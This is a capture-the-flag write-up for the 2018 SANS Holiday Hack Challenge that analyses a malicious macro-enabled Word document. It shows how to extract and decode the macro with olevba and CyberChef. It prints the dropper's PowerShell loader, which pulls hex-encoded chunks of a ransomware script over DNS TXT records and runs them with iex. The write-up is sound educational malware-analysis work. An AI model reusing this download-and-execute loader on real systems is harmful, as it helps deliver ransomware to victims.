March 14, 2019

Identify the Domain

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup


Hey, you’re pretty good at this security stuff. Could you help me further with what I suspect is a malicious Word document?

All the elves were emailed a cookie recipe right before all the infections. Take this document with a password of elves and find the domain it communicates with.


Dropper Download

Word docm macros can be extracted using olevba.

Perhaps we can use this to grab the ransomware source.


1- Recommended watch Chris Davis talk’s about Analyzing PowerShell Malware :

2- Download the malicious Word document :

Alert ! Alert ! Alert !


3- You can get windows ready virtual machine from here :

or from here

4- Run the virtual machine and copy zipped malware file to it.

5- Unzip the file with password elves

6- You will get the malicious Word document CHOCOLATE_CHIP_COOKIE_RECIPE.docm

7- Make sure you have installed Python 2.7 to be able to run the analysis tools :

How to install tutorial :

8- Make sure you have installed Visual Basic Code , it’s easier for read/edit PowerShell scripts:

9- Start the PowerShell from windows menu

10- Install olevba tool : since we will be using Windows 10 VM for this analysis we will install using the following command in your VM terminal :

pip install -U oletools

You can refer to olevba wiki for more details

11- Let’s extract macro from malware using olevba tool :

  • Change the directory to where you put the malware file then check by using dir :


  • Run olevba to extract macros from malware file


  • This the macro malicious PowerShell processor code :


  • We could use the command it self or use online tool to decode than unzip to readable text format:

Method 1:

Let’s run the command but first we need to modify it, Remove the following:
Then add at the end | Out-File source-1.ps1 to save the result to file , The PowerShell code will be :


Type this code in terminal and run it , then check the file source-1.ps1 by using ls command.


Let’s look at source-1.ps1 : type .\source-1.ps1


Method 2:
Using online converter “CyberChef” , Copy the base64 code to input filed > select from base64 option and raw inflate option:


Copy the result to new file in Visual Basic Code and save it to as source-1.ps1

12- As you can see from both methods It’s retrieve more PowerShell scripts to run,
function H2A($a) {$o; $a -split ‘(..)’ | ? { $_ } | forEach {[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o}; $f = “77616E6E61636F6F6B69652E6D696E2E707331”; $h = “”; foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server -Name “$” -Type TXT).strings, 10)-1)) {$h += (Resolve-DnsName -Server -Name “$i.$” -Type TXT).strings}; iex($(H2A $h | Out-string))

And it’s communicate with the domain to download the PowerShell script with code 77616E6E61636F6F6B69652E6D696E2E707331 which we decoded before to wannacookie.min.ps1 .

📟 Go to your Badge > Objectives > Enter

kc18_elves_elf_21.png, I wonder what that means?